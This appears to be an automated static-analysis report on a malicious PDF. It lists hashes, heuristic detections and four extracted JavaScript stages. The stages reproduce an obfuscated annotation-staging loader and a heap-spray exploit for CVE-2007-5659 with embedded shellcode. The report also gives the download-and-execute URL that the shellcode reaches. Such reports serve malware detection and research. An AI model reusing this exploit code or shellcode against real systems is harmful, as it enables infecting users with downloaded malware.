Malicious PDF — malware analysis report

Static analysis result for SHA-256 a6a4c33d4a0f400a…

Verdict: MALICIOUS
File type: PDF
Size: 8.5 KB
First seen: 2026-05-08
MD5: 4831b7e09b36dd7a292b215e9549cb52
SHA-1: d6c071540c30a096cf3aacd177efc1f55a4c4e2d
SHA-256: a6a4c33d4a0f400a8028561b3fbce87244366a56c4ecbcb83497cbf417272e90
Risk score: 266

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF contains embedded JavaScript, indicated by multiple heuristic firings on PDF JavaScript actions and /JS streams. The extracted scripts 'javascript_obj0004_000.js', 'numeric_charcode_stage_000.js' and 'legacy_pdfkit_stage_000.js' show a multi-stage attempt to obfuscate and execute malicious code. The 'PDF_FOXIT_SYNCANNOTSCAN' heuristic specifically points to the staging technique in which the script calls syncAnnotScan(), reads an annotation /Subject field, decodes its character codes into JavaScript and evaluates the result. The final stage likely aims to download and execute a second-stage payload.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics (9)

  • Collab.collectEmailInfo — CVE-2007-5659 (severity: critical; CVE match: exact; rule: CVE_2007_5659)
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action (severity: low; 4 related findings; rule: PDF_JAVASCRIPT)
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate for CVE-2007-5659 (severity: high; CVE match: likely; rule: PDF_JS_ADOBE_APSB08_13_PATCH_GATE)
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
    Matched line in script
    var Hx272_1_x = new Array();var E3p6JDeh5U2b = 0;var Um5nHA = "";function f_2_6_e(b385QA__a8l_f, P_P___5QLem){var W_gj0754x = P_P___5QLem.toString();var O_4_n_2dWR45Tks = "";for(var D8_03l_n_V4O3_r = 0; D8_03l_n_V4O3_r < W_gj0754x.length; D8_03l_n_V4O3_r++) {var v__lawjsP = parseInt(W_gj0754x.substr(D8_03l_n_V4O3_r, 1));if (!isNaN(v__lawjsP)) {v__lawjsP = v__lawjsP.toString(16);if (v__lawjsP.length == 1) { v__lawjsP = "0" + v__lawjsP; }else if (v__lawjsP.length != 2) { v__lawjsP = "00"; }O_4_n_2 …
  • PDF JavaScript exploit cluster (severity: critical; rule: PDF_JS_EXPLOIT_CLUSTER)
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
            for (var i=0; i < list.length; i++) {
                result +=  String.fromCharCode(list[i] - jump);
            }
  • PDF exploit shellcode contains an embedded download URL (severity: high; rule: PDF_JS_SHELLCODE_DOWNLOAD_URL)
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream (severity: low; rule: PDF_JS)
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • syncAnnotScan annotation-staging primitive (severity: low; rule: PDF_FOXIT_SYNCANNOTSCAN)
    PDF JavaScript calls syncAnnotScan() — a no-op annotation-enumeration primitive used by exploit-kit JavaScript to stage payload reads from annotation /Subject fields before eval(). Not a vulnerable sink itself; rarely seen in legitimate PDFs. (identified after JavaScript deobfuscation)
  • Suspicious extracted artifact (severity: info; rule: EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://googleinru.in/cgi-bin/etn/z002106201r0019R97f3b4e5X0bc5ac29Y74061c9bZ0100f060 (referenced by PDF JavaScript)

Extracted artifacts (4)

Files carved from inside the sample during analysis.

Filename: javascript_obj0004_000.js
Kind: pdf-javascript-stream
Source: PDF /JS object 4 at offset 0xE1
Size: 1940 bytes
SHA-256: be4694a17eb89a55f7eb3db389ba2bc4f102f4c7dcfc99549d848cdb7df5dfb5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
sourceCode = "118,97,114,32,112,114,32,61,32,110,117,108,108,59,13,10,118,97,114,32,102,110,99,32,61,32,39,101,118,39,59,13,10,118,97,114,32,115,117,109,32,61,32,39,39,59,13,10,13,10,97,112,112,46,100,111,99,46,115,121,110,99,65,110,110,111,116,83,99,97,110,40,41,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,33,61,32,48,41,32,123,13,10,9,118,97,114,32,110,117,109,32,61,32,49,59,13,10,13,10,9,112,114,32,61,32,97,112,112,46,100,111,99,46,103,101,116,65,110,110,111,116,115,40,13,10,9,9,123,13,10,9,9,9,110,80,97,103,101,58,32,48,13,10,9,9,125,13,10,9,41,59,13,10,13,10,9,115,117,109,32,61,32,112,114,91,110,117,109,93,46,115,117,98,106,101,99,116,59,13,10,125,13,10,13,10,118,97,114,32,98,117,102,32,61,32,34,34,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,32,51,41,32,123,13,10,9,102,110,99,32,43,61,32,39,97,39,59,13,10,9,118,97,114,32,97,114,114,32,61,32,115,117,109,46,115,112,108,105,116,40,47,45,47,41,59,10,9,118,97,114,32,112,114,111,99,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,50,50,43,49,53,41,59,10,9,13,10,9,102,111,114,32,40,118,97,114,32,105,32,61,32,49,59,32,105,32,60,32,97,114,114,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,13,10,9,9,98,117,102,32,43,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,34,48,120,34,43,97,114,114,91,105,93,41,59,13,10,9,125,13,10,125,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,61,32,50,41,32,123,13,10,9,102,110,99,32,43,61,32,39,108,39,59,13,10,9,97,112,112,91,102,110,99,93,40,98,117,102,41,59,13,10,125,13,10"; 
function decrypt(str, jump){
    var result = "";
    var list = str.split(',');
    for (var i=0; i < list.length; i++) {
        result +=  String.fromCharCode(list[i] - jump);
    }
    return result;
}
Filename: numeric_charcode_stage_000.js
Kind: deobfuscated-js
Source: numeric char-code string decoded JavaScript at offset 0xEF
Size: 505 bytes
SHA-256: 6c41320119e160dc719997b9a2efb3600ea9d7e9d7e44b4dc2125762dc9f365f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);
	var proc = String.fromCharCode(22+15);
	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
}

if (app.plugIns.length >= 2) {
	fnc += 'l';
	app[fnc](buf);
}
Filename: legacy_pdfkit_stage_000.js
Kind: deobfuscated-js
Source: repeated-marker hex decoded JavaScript at offset 0x1C97
Size: 1742 bytes
SHA-256: 54741795558ba624990d1d1977c984a983f099f3011df3eac2b542668249772d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function t8Fvl__6_8(v_f0lc_wvA2b, G______i_5sqrM){var B8Uhen2lNv = 4;var VC_r_1_0rv_BPK = new Array();var TLhMMrH = new Array(107,256,11,  512, 106, 11,  44,40, 33);TLhMMrH[5] += 12;var r_4_RW8_w01_u = "";try {var hKbp4jqG_EhRq_y = 0;if (app) {G______i_5sqrM = pr[hKbp4jqG_EhRq_y].subject;}} catch(e) {}if (!v_f0lc_wvA2b) { VC_r_1_0rv_BPK[0] = 0;VC_r_1_0rv_BPK[1] = VC_r_1_0rv_BPK[0];VC_r_1_0rv_BPK[2] = VC_r_1_0rv_BPK[1];VC_r_1_0rv_BPK[3] = VC_r_1_0rv_BPK[2];var c___1_6Tt_5A = TLhMMrH[6] + 3;var x_wVX6k = c___1_6Tt_5A + 11;var K_660_o = t8Fvl__6_8;var D8qfAU2p = 0;K_660_o = K_660_o.toString();for(var G2N_FR8 = 0; G2N_FR8 < K_660_o.length; G2N_FR8++) {var l_R0jMd__v64O_1 = K_660_o.charCodeAt(G2N_FR8);if (l_R0jMd__v64O_1 > c___1_6Tt_5A && l_R0jMd__v64O_1 < x_wVX6k) {if (D8qfAU2p == 4) {D8qfAU2p = 0;}VC_r_1_0rv_BPK[D8qfAU2p] += l_R0jMd__v64O_1;if (VC_r_1_0rv_BPK[D8qfAU2p] > TLhMMrH[3]) {VC_r_1_0rv_BPK[D8qfAU2p] -= 512;}D8qfAU2p++;}}}else  { VC_r_1_0rv_BPK = v_f0lc_wvA2b;}for (var vIiyd_e7_4bn_A = 0; vIiyd_e7_4bn_A < 4; vIiyd_e7_4bn_A++) {if (VC_r_1_0rv_BPK[vIiyd_e7_4bn_A] > TLhMMrH[1]) {VC_r_1_0rv_BPK[vIiyd_e7_4bn_A] -= TLhMMrH[1];}}var YmRt_8P_0Wn = 0;var EoHU_q = 0;var S_4613_Mc;var ynxf__f = 0;while ( YmRt_8P_0Wn < G______i_5sqrM.length ) {var w0HDa_h = "";w0HDa_h = G______i_5sqrM.substr(YmRt_8P_0Wn, 2);var Fc_RtmB76bF_kt = parseInt(w0HDa_h, TLhMMrH[5]); if (EoHU_q == 4) {EoHU_q = 0;}Fc_RtmB76bF_kt -= (ynxf__f + 2) * VC_r_1_0rv_BPK[EoHU_q];if (Fc_RtmB76bF_kt < 0) {Fc_RtmB76bF_kt -= Math.floor(Fc_RtmB76bF_kt / TLhMMrH[1]) * TLhMMrH[1];}r_4_RW8_w01_u += String.fromCharCode(Fc_RtmB76bF_kt);{YmRt_8P_0Wn += 2;ynxf__f++;EoHU_q++;}}var b_8c2_VR = this;b_8c2_VR["eval"](r_4_RW8_w01_u);return 0;}

	t8Fvl__6_8(0);
Filename: legacy_pdfkit_stage_001.js
Kind: deobfuscated-js
Source: annotation-subject callee-key decoded JavaScript at offset 0x4C3
Size: 5070 bytes
SHA-256: 92ef86ef0b6baa9734d9fdcd2f4cea9c6ae0ae4dfb9833e767d37db8ff650876
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var Hx272_1_x = new Array();var E3p6JDeh5U2b = 0;var Um5nHA = "";function f_2_6_e(b385QA__a8l_f, P_P___5QLem){var W_gj0754x = P_P___5QLem.toString();var O_4_n_2dWR45Tks = "";for(var D8_03l_n_V4O3_r = 0; D8_03l_n_V4O3_r < W_gj0754x.length; D8_03l_n_V4O3_r++) {var v__lawjsP = parseInt(W_gj0754x.substr(D8_03l_n_V4O3_r, 1));if (!isNaN(v__lawjsP)) {v__lawjsP = v__lawjsP.toString(16);if (v__lawjsP.length == 1) { v__lawjsP = "0" + v__lawjsP; }else if (v__lawjsP.length != 2) { v__lawjsP = "00"; }O_4_n_2dWR45Tks = v__lawjsP + O_4_n_2dWR45Tks;}}while(O_4_n_2dWR45Tks.length < 8) { O_4_n_2dWR45Tks = "0" + O_4_n_2dWR45Tks; }var w70__tT___lu = b385QA__a8l_f.toString(16);if (w70__tT___lu.length == 1) { w70__tT___lu = "0" + w70__tT___lu; }else if (w70__tT___lu.length != 2) { w70__tT___lu = "00"; }O_4_n_2dWR45Tks = "3" + w70__tT___lu + "P" + O_4_n_2dWR45Tks;return O_4_n_2dWR45Tks;}function q7J_16(S58d8S_10, Qi2R_c){var V3ye__r73 = new Array("");var c__5_3_da = S58d8S_10;var LEm8u4xVOJw71Dr;if ((LEm8u4xVOJw71Dr = S58d8S_10.lastIndexOf("%u00")) != -1) {if (LEm8u4xVOJw71Dr + 6 == S58d8S_10.length) {V3ye__r73[0] = S58d8S_10.substr(LEm8u4xVOJw71Dr + 4, 2);c__5_3_da = S58d8S_10.substring(0, LEm8u4xVOJw71Dr);}}LEm8u4xVOJw71Dr = 1;for (D8_03l_n_V4O3_r = 0; D8_03l_n_V4O3_r < Qi2R_c.length; D8_03l_n_V4O3_r++) {var X6_bp_B__K = Qi2R_c.charCodeAt(D8_03l_n_V4O3_r).toString(16);if (X6_bp_B__K.length == 1) { X6_bp_B__K = "0" + X6_bp_B__K; }V3ye__r73[LEm8u4xVOJw71Dr] = X6_bp_B__K;LEm8u4xVOJw71Dr++;}D8_03l_n_V4O3_r = V3ye__r73[0].length ? 
0 : 1;V3ye__r73[LEm8u4xVOJw71Dr] = "00";V3ye__r73[LEm8u4xVOJw71Dr + 1] = "00";LEm8u4xVOJw71Dr += 2;if ((V3ye__r73.length - D8_03l_n_V4O3_r) % 2) {V3ye__r73[LEm8u4xVOJw71Dr] = "00";}while(D8_03l_n_V4O3_r < V3ye__r73.length) {c__5_3_da += "%u" + V3ye__r73[D8_03l_n_V4O3_r + 1] + V3ye__r73[D8_03l_n_V4O3_r];D8_03l_n_V4O3_r += 2;}c__5_3_da += "%u0000";return c__5_3_da;}function cO_b_Qn(N4UY_1d, hw0J__3j3){while (N4UY_1d.length*2<hw0J__3j3) {N4UY_1d += N4UY_1d;}N4UY_1d = N4UY_1d.substring(0,hw0J__3j3/2);return N4UY_1d;}function Uki_38hm_j(dc_0O7e8NRc, mpDI_nPlJ, p4__k6_KXocX){var SS7_g1X_H477 = 0x0c0c0c0c;var N4UY_1d = unescape(mpDI_nPlJ);var Qi2R_c = f_2_6_e(dc_0O7e8NRc, p4__k6_KXocX);var Cl05U_l__1Rmn = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var S58d8S_10 = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc%u0000%u645f%u30a1%u0000%u7800%u8b0c%u0c40%u708b%uad1c%u688b%ueb08%u8b09%u3440%u408d%u8b7c%u3c68%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u782e%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%uffe8%ufffe%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u7670%u5945%u0076%u7468%u7074%u2f3a%u672f%u6f6f%u6c67%u6965%u726e%u2e75%u6e69%u632f%u6967%u622d%u6e69%u652f%u6e74%u7a2f%u3030%u3132%u3630%u3032%u7231%u3030%u3931%u3952%u6637%u6233%u6534%u5835%u6230%u3563%u6361%u3932%u3759%u3034%u3136%u3963%u5a62%u3130%u3030%u3066%u3036";app.f__yi73ky = unescape(q7J_16(S58d8S_10, Qi2R_c));var b__O_Ld = 0x400000;var Llcc2Pk_FcaGi = Cl05U_l__1Rmn.length * 2;var hw0J__3j3 = b__O_Ld - (Llcc2Pk_FcaGi+0x38);N4UY_1d = cO_b_Qn(N4UY_1d, hw0J__3j3);var ITI244W3 = (SS7_g1X_H477 - 0x400000)/b__O_Ld;for (var JE_i_7n = 0; JE_i_7n < ITI244W3; JE_i_7n++) {Hx272_1_x[JE_i_7n] = N4UY_1d + Cl05U_l__1Rmn;}}function PL2i67_0_N__3Dg(){var Q__Ug72Y = "";for (D8_03l_n_V4O3_r = 0; D8_03l_n_V4O3_r < 12; D8_03l_n_V4O3_r++) {Q__Ug72Y += unescape("%u0c0c%u0c0c");}var SI1_A_l_egf7 = "";for (D8_03l_n_V4O3_r = 0; D8_03l_n_V4O3_r < 750; D8_03l_n_V4O3_r++) {SI1_A_l_egf7 += Q__Ug72Y;}this.collabStore = Collab.collectEmailInfo({subj: "", msg: SI1_A_l_egf7});app.clearTimeOut(E3p6JDeh5U2b);}function Ppq_uC(odl406k2__s4e_i){var WD5iol2f0_BR = E3p6JDeh5U2b;if ((odl406k2__s4e_i >= 8 && odl406k2__s4e_i < 8.11) || odl406k2__s4e_i < 7.1) {Uki_38hm_j(23, "%u0c0c%u0c0c", odl406k2__s4e_i);PL2i67_0_N__3Dg();}if (WD5iol2f0_BR) {app.clearTimeOut(WD5iol2f0_BR);}}var p4__k6_KXocX = 0;var N1AHR_4 = app.plugIns;for (var a_6_u_p_1 = 0; a_6_u_p_1 < N1AHR_4.length; a_6_u_p_1++) {var f0ce_X6a35 = N1AHR_4[a_6_u_p_1].version;if (f0ce_X6a35 > p4__k6_KXocX) { p4__k6_KXocX = f0ce_X6a35; }}if (app.viewerVersion == 9.103 && p4__k6_KXocX < 9.13) {p4__k6_KXocX = 9.13;}app.qu___T2C1S1_1Eh = Ppq_uC;E3p6JDeh5U2b = app.setTimeOut("app.qu___T2C1S1_1Eh(" + p4__k6_KXocX.toString() + ")", 50);